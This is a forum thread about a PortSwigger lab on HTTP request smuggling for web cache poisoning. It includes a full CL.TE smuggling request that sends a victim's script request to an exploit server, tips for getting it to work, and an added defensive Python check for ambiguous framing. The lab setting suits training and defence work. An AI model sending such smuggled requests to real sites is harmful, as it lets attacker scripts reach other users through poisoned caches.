The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


LAB: Exploiting HTTP request smuggling to perform web cache poisoning

nergal | Last updated: Aug 20, 2021 10:19PM UTC

Hello everyone! I'm having trouble with this lab. I even tried following the YouTube videos to get to the solution, and not even that helps. I'm getting a 400 and {"error":"Invalid request"}. I also tried switching browsers, because I had problems with that in the web cache poisoning labs too. Am I doing something wrong? I'll paste the request:

POST / HTTP/1.1
Host: victimhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 185
Transfer-Encoding: chunked

0

GET /post/next?postId=1 HTTP/1.1
Host: exploitserver
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

x=1

GET /resources/js/tracking.js HTTP/1.1
Host: victimhost
Connection: close
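Added example, not part of the thread and not PortSwigger's code: the request above carries both Content-Length and Transfer-Encoding: chunked, which RFC 7230 section 3.3.3 says ought to be handled as an error. This sketch shows a front-end check that rejects such framing and reports the bytes a chunk-aware server would treat as the next request. The function names and the sample request (with placeholder hostnames) are constructed for illustration.

```python
# Defender-side framing check for requests like the one posted above.
# Hostnames and the sample request are constructed placeholders.

def parse_head(raw: bytes):
    """Split a raw request into header map (lower-cased names) and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers, body

def chunked_end(body: bytes) -> int:
    """Offset just past the terminating zero-size chunk (ValueError if malformed)."""
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)
        pos = eol + 2
        if size == 0:
            if body.startswith(b"\r\n", pos):
                return pos + 2
            return body.index(b"\r\n\r\n", pos) + 4  # skip trailer fields
        pos += size + 2

def inspect(raw: bytes) -> dict:
    headers, body = parse_head(raw)
    cl = headers.get(b"content-length", [])
    te = [v.lower() for v in headers.get(b"transfer-encoding", [])]
    result = {"ambiguous": bool(cl and te), "leftover": b"", "action": "forward"}
    if any(b"chunked" in v for v in te):
        try:
            # Bytes a chunk-aware server would treat as the start of the next request.
            result["leftover"] = body[chunked_end(body):]
        except ValueError:
            result["action"] = "reject"
    if result["ambiguous"] or len(set(cl)) > 1:
        result["action"] = "reject"
    return result

SMUGGLED = (b"GET /post/next?postId=1 HTTP/1.1\r\nHost: exploitserver\r\n"
            b"Content-Length: 10\r\n\r\nx=1")
BODY = b"0\r\n\r\n" + SMUGGLED
SAMPLE = (b"POST / HTTP/1.1\r\nHost: victimhost\r\n"
          b"Content-Length: " + str(len(BODY)).encode() + b"\r\n"
          b"Transfer-Encoding: chunked\r\n\r\n" + BODY)

if __name__ == "__main__":
    print(inspect(SAMPLE))
```

A non-empty `leftover` on a request that also declares Content-Length is the signal worth logging: the two framing headers disagree about where the request ends.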

Alex, PortSwigger Agent | Last updated: Aug 23, 2021 04:13PM UTC

Hi, Thanks for your post. You may need to repeat the POST/GET process several times before the attack succeeds. It might also be worth disabling any extensions and retrying the lab - in case there are any conflicting options. Thanks

nergal | Last updated: Aug 23, 2021 06:54PM UTC

I repeated it several times trying to get it, but still nothing. I also used a Chrome browser without extensions, Mozilla Firefox, and Chromium, on both Windows and Linux. Still not getting it.

nergal | Last updated: Aug 24, 2021 03:05AM UTC

OK, I did it. I was searching for help in another channel and a friend told me to intercept the request to send the "exploit" instead of using the Repeater. That way I just had to send it once and it worked on the first shot. Anyway, thank you for your time!

Alex, PortSwigger Agent | Last updated: Aug 24, 2021 07:47AM UTC

Hi, Thanks for the update, glad to hear you solved the lab!

Viren | Last updated: Sep 12, 2021 12:36PM UTC

Use 193 instead of 185 in the Content-Length header count (it is probably due to some new format of the exploit server domains, which added 8 additional characters with the "exploit-" prefix).

kairosdev | Last updated: Sep 16, 2021 09:15AM UTC

Thanks Viren. I think PortSwigger staff should announce these changes. Otherwise, it's a waste of time trying to figure out how to make it work. Change the solution paragraph on the lab.

Ben, PortSwigger Agent | Last updated: Sep 17, 2021 08:32AM UTC

Hi, Thank you for letting us know about this. We will take a look and discuss this with the Web Academy team.

Ben, PortSwigger Agent | Last updated: Oct 20, 2021 08:54AM UTC

Hi all, Just to confirm, we have now made the change to the solution of this lab (as discussed above) so that it states the correct Content-Length value to use now that we are prefixing the Exploit Server URLs with 'exploit-'.

Sean | Last updated: Dec 23, 2021 12:43AM UTC